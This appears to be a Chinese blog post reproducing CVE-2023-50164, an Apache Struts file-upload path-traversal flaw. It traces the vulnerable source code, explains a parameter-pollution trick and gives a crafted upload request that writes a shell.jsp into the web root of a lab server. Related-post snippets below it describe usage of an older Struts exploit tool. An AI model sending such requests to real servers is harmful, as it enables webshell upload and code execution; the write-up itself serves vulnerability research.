【漏洞复现】Apache Struts CVE-2023-50164

已于 2023-12-20 17:45:38 修改
阅读量626 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: apache struts java
于 2023-12-20 17:29:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/135113325
版权
Struts2 官方披露 CVE-2023-50164 Apache Struts 文件上传漏洞,攻击者可利用该漏洞污染相关上传参数导致目录遍历,在具体代码环境中可能导致上传 Webshell,执行任意代码。

漏洞描述

Apache Struts2 是一个开源的 Java Web 应用程序开发框架,旨在帮助开发人员构建灵活、可维护和可扩展的企业级Web应用程序。近日,Struts2 官方披露 CVE-2023-50164 Apache Struts 文件上传漏洞,攻击者可利用该漏洞污染相关上传参数导致目录遍历,在具体代码环境中可能导致上传 Webshell,执行任意代码。

漏洞分析

Struts2的默认配置通常包含,该拦截器负责处理文件上传,并将文件信息封装到相应的Action属性中。FileUploadInterceptor

正常文件上传

当我们使用默认配置上传文件,尝试路径穿越将文件上传至任意目录,测试发现无法路径穿越到任意目录

图片-20231210165300222

我们在打下断点,跟进代码FileUploadInterceptor#intercept()

图片-20231210165628696

这里跟进multiWrapper.getFileNames()

图片-20231210170059050

这里继续跟进getCanonicalName()

图片-20231210170542142

发现获取文件名是通过substring方法进行截取的,通过../../进行目录穿越是不行的。

参数污染

回到中,在获取文件名后生成了两个变量和FileUploadInterceptor#intercept()contentTypeNamefileNameName

图片-20231210172857904

图片-20231210180044724

  1. 检查每一个文件是否可以被接受(根据配置规则检查,默认全部接受)

  2. 对可以接受的文件,将其文件名、内容类型和文件内容分别保存到三个List中(acceptedFileNames、acceptedContentTypes和acceptedFiles)

  3. 如果接受的文件列表不为空,则将这三个List分别封装成Parameter,并存入参数Map中:

    • 文件内容列表acceptedFiles 封装成参数 inputName
    • 内容类型列表 acceptedContentTypes 封装成参数 contentTypeName
    • 文件名列表 acceptedFileNames 封装成参数 fileNameName

  4. 最后将这个参数Map 设置到上下文的Parameters中,在中对这些参数赋值ParametersInterceptor#setParameters()

跟进ParametersInterceptor#setParameters()

图片-20231210181151414

这里采用创建参数HttpParameters.create()

而在新版本中,对HttpParameters做出了修改,变成了大小写不敏感,而在存在漏洞的版本中是大小写敏感的。

图片-20231210182522101

这导致了这里FileFileName和fileFileName会是不同的参数,都会在赋值ParametersInterceptor#setParameters()

而后面采用了使用 OGNL 表达式调用 setter 方法对变量赋值

图片-20231210183238455

OGNL 在查找 setter 方法时,会自动把属性名第一个字母变成大写,然后查找 setXxx() 这样的方法。

例如,如果你有一个属性名为 “name”,那么 OGNL 会查找 setName() 方法。在这个过程中,不管 name 在 OGNL 表达式中是大写还是小写,都可以正确找到 setter 方法。所以在 Struts 2 的 OGNL 表达式中,属性名的首字母大小写可以不敏感。

所以当我手动传入一个fileFileName参数,在这里也会被赋值,fileFileName和FileFileName参数会被自动映射到同一个参数上。调用相应的get方法获取值时,会取得最后赋值的那个参数的值。

那么这两个参数的赋值先后顺序呢?如果我们手动传入的参数会后赋值,就可以覆盖掉前面的参数,造成参数污染。

在TreeMap中,键(key)的排序是大小写敏感的。默认的排序规则如下:

  1. 大写字母会排在小写字母之前
  2. 数字会排在字母之前

所以当文件上传的name构造为大写开头,手动传入的污染参数构造为小写开头即可

图片-20231210184928102

漏洞复现

构造数据包:

POST /s2/upload.action?fileFileName=../webapps/ROOT/shell.jsp HTTP/1.1

主机:192.168.31.185:8080

内容长度:416

缓存控制:max-age=0

产地:http://192.168.31.185:8080

DNT:1

升级不安全请求:1

内容类型:multipart/form-data;边界=----WebKitFormBoundaryjYgoTIxv686oqL3F

用户代理:Mozilla/5.0 (Macintosh;Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

接受:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

推荐人:http://192.168.31.185:8080/s2/

接受编码:gzip、deflate

接受语言:zh-CN,zh;q=0.9,en;q=0.8

连接:关闭

------WebKitFormBoundaryjYgoTIxv686oqL3F

内容处置:表单数据;name=“文件”;文件名=“测试.jsp”

内容类型:application/octet-stream

测试

------WebKitFormBoundaryjYgoTIxv686oqL3F

内容处置:表单数据;name=“提交”

提交

------WebKitFormBoundaryjYgoTIxv686oqL3F--

文件上传成功,成功路径穿越到webapps目录下!

图片-20231210185327794

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

 

渗透测试老鸟-九青
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
撑杆 Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 python struts-pwn.py --check --list 'urls.txt' 要求 Python2或Python3 要求 法律免责声明 该项目仅用
Struts2 安全漏洞解决方法
09-15
Struts2 安全漏洞解析,距离上个版本发布仅仅过去1周,apache struts官网又发布struts2最新版本安全公告,主要修复了一个漏洞,代号S2-022:从漏洞简要描述来看,确定是对之前S2-021的补充。
利用活动挂载漏洞处理危险的Apache Struts 2错误
kafankeji的博客
12-18 68
Akamai在一份报告中总结了对该威胁的分析,称要利用该漏洞,攻击者首先需要扫描并识别使用易受攻击的Apache Struts版本的网站或Web应用程序。然后,他们需要发送一个特制的请求,将文件上传到易受攻击的网站或Web应用程序。这个漏洞引起了相当大的关注,因为它的普遍性,它是远程可执行的事实,并且因为它的概念验证漏洞代码是公开可用的。趋势科技的研究人员本周分析了新的Apache Struts漏洞,他们将其描述为一个危险的漏洞,但比2017年的漏洞更难大规模利用,后者只不过是一个扫描和利用问题。
高危!Apache OFBiz未授权远程代码执行漏洞风险通告
亚信安全官方账号的博客
12-07 201
亚信安全CERT监控到Apache OFBiz未授权远程代码执行漏洞,建议相关用户尽快采取相关措施。
Apache警告Struts 2中的关键漏洞
kafankeji的博客
12-13 62
Qualys安全研究经理Mayuresh Dani解释说:“这是一个高度严重的漏洞,因为它不仅仅是一个简单的目录遍历漏洞。任何允许文件上传的脆弱的Struts 2实现都允许攻击者上传恶意文件,从而执行代码。Atlassian Confluence的一份摘要解释说:“攻击者可以操纵文件上传参数来启用路径遍历,在某些情况下,这可能导致上传可用于执行远程代码执行的恶意文件。威胁研究人员后来警告说,如果不打补丁,成千上万运行Struts 2的应用程序可能会以同样的方式成为恶意行为者的攻击目标。
CVE-2023-38545 && CVE-2023-38546 漏洞原理及影响范围
BGiscool的博客
10-11 1827
由于一个错误,在缓慢的SOCKS5握手过程中,表示“让主机解析名称”的本地变量可能会得到错误的值,并且与目的相反,将过长的主机名复制到目标缓冲区,而不是仅复制已解析的地址。如果源句柄未从磁盘上的特定文件读取任何 Cookie,则克隆版本的句柄会将文件名存储为 (使用四个 ASCII 字母,不带引号)。随后使用克隆的句柄(如果未显式设置要从中加载 cookie 的源)会无意中从名为 - 如果此类文件存在并且可以使用 libcurl 在程序的当前目录中读取。libcurl 7.69.0至8.3.0。
CVE-2023-50164 Apache Struts2漏洞复现
黑剑
12-15 2838
从本质上讲,该漏洞允许攻击者利用 Apache Struts 文件上传系统中的缺陷。它允许他们操纵文件上传参数并执行路径遍历。这种利用可能会导致在服务器上执行任意代码,从而导致各种后果,例如未经授权的数据访问、系统受损,甚至完全控制受影响的系统,包括在系统中放置恶意文件。仔细一看,CVE-2023-50164涉及Apache Struts的文件上传机制中的一个漏洞。对于非技术受众,想象一下这样一个场景:安全检查点(文件上传机制)由于漏洞而被绕过,从而允许未经授权的访问安全区域(服务器)。
Error系列-CVE CIS-2023系统漏洞处理方案集合
tangdou369098655的博客
06-06 5929
网络安全-CVE - CIS 漏洞分析以及解决
【已复现Apache Struts 文件上传漏洞(CVE-2023-50164)安全风险通告第二次更新
smellycat000的专栏
12-12 925
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Apache Struts 文件上传漏洞漏洞编号QVD-2023-46516、CVE-2023-50164公开时间2023-12-07影响对象数量级十万级奇安信评级高危CVSS 3.1分数8.1威胁类型代码执行利用可能性中POC状态已公开在野利用状态未发现EXP状态未公开技术细节状态已公开利用条件:该漏洞的利用依赖于特定环境的条件,需要根...
漏洞复现Apache Struts2 CVE-2023-50164
qq_18193739的博客
12-11 4018
Apache Struts 2 CVE-2023-50164 漏洞复现
网络安全日报 2023年12月12日
Galaxy_0的博客
12-12 996
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
最新发布
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
安全漏洞周报(2023.12.04-2023.12.11)
Enlink_Young的博客
12-12 190
易安联专注零信任安全,先后发布EnSDP(零信任安界防护平台)、EnBox(零信任安全工作空间)、EnCASB(零信任云应用安全接入平台)、EnAppGate(统一资源发布系统)、EnIAM(零信任身份管理平台)、EnDTA(天织·DTA威胁分析系统)等多款产品及解决方案,推出ZTNA零信任网络架构解决方案和EnSASE安全访问服务边缘解决方案并提供包括安全运维、实战攻防、应急演练等安全服务。推出的威胁情报和天织DNS威胁分析平台,可以为用户提供高效的威胁防护能力,帮助用户更好地应对各类网络威胁。
Apache Struts 代码执行漏洞风险通告
亚信安全官方账号的博客
12-15 201
亚信安全监测发现Apache披露Apache Struts代码执行漏洞,攻击者可上传恶意文件,请相关用户尽快采取措施。
tomcat 文件上传 (CVE-2017-12615)漏洞复现
weixin_42675091的博客
09-01 354
tomcat 文件上传 (CVE-2017-12615)漏洞复现
漏洞分析|S2-066—Apache Struts2 文件上传漏洞CVE-2023-50164
xuandaoren的博客
12-23 1218
补丁修复的HttpParameters大小写敏感问题,如果此时通过参数绑定传递MyFaceFileName,在上传表单名中传递myFace(inputName+FileName),此时HttpParameters里面是myFaceFileName与MyFaceFileName,这个时候key不一样,可以同时存在于HttpParameters的。发现对HttpParameters进行了修改,对参数大小写进行了控制,强制将参数都转换成了小写,漏洞和大小写参数有关。
Apache Shiro 目录穿越漏洞 CVE-2023-34478
07-29
很抱歉,但我没有找到关于Apache Shiro目录穿越漏洞CVE-2023-34478的相关信息。根据我所了解的情况,Apache Shiro在2022年6月29日披露了一个权限绕过漏洞CVE-2022-32532),该漏洞可能导致未经授权的远程攻击者绕过身份认证。Apache官方已发布修复此漏洞的版本,并建议用户尽快升级至Apache Shiro 1.9.1及以上版本以确保安全。\[1\]\[2\]\[3\] 请注意,我的回答是基于提供的引用内容,如果有任何其他信息或更新,请参考官方渠道获取最新信息。 #### 引用[.reference_title] - *1* *3* [[ 漏洞复现篇 ] Apache Shiro 身份认证绕过漏洞 (CVE-2022-32532)](https://blog.csdn.net/qq_51577576/article/details/126155240)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Apache Shiro权限绕过漏洞CVE-2022-32532)](https://blog.csdn.net/weixin_54438700/article/details/128324850)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值